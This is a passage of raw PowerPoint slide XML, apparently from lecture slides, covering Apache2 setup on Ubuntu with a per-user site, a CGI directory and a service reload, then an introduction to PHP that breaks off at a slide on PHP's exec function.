            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cshen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0" smtClean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800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>UserDir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public-web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>public_html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endParaRPr lang="en-US" sz="1800" b="1" dirty="0" smtClean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800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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cshen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/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dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/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690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Install and Configure Apache2 (3)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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>the web server to dish out the pages that may reside in the different accounts on your Ubuntu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The directory that holds the magic to accessing the different accounts for web content is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/apache2/sites-available/ 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$ cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/apache2/sites-available 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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cp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>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>000-default.conf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cshen.conf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800" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>nserted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;Directory&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>element </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cshen.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;Directory /home</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cshen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>public-web/&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  Options </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Indexes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>FollowSymLinks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err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>MultiViews</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> 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400050" lvl="1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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>AllowOverride</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>None</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  Require </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>all granted 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400050" lvl="1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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/Directory&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>back </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/apache2/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>enable the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cshen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> “virtual server”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$ a2ensite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cshen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean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/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>creates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>symbolic link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sites-enabled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sites-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>available </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cshen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>site </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57150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pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr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dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/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dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/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943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Install and Configure Apache2 (4)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1800" dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>pages being served out by Apache2 invoke CGI scripts, you have to tell the server how to find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Assume CGI scripts are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>in my own </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>nclude </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cshen.conf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dirty="0"/>
              <a:t>file in the sites-available directory the following directives </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;Directory "/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-bin"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:b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AllowOverride</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> None</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Options +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ExecCGI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>MultiViews</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SymLinksIfOwnerMatch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</a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Require all granted </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/Directory&gt;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2000" dirty="0" smtClean="0"/>
              <a:t>Reload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the new configuration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$ service apache2 reload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty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pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/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sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier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937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Introduction to PHP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400" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>ecursive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>acronym for “PHP: Hypertext Preprocessor” </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>GNU for GNU's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unix</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>popular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>server-side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> scripting language </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>generating dynamic content for web pages </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Excellent language </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>support for interacting with practically all commonly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>-used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>databases </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>us.php.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/manual/ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http://www.w3schools.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/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400" dirty="0"/>
              <a:t>How PHP runs on your machine is determined by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> file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endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRP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949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en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>PHP’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>System Program Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> Function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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>executing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
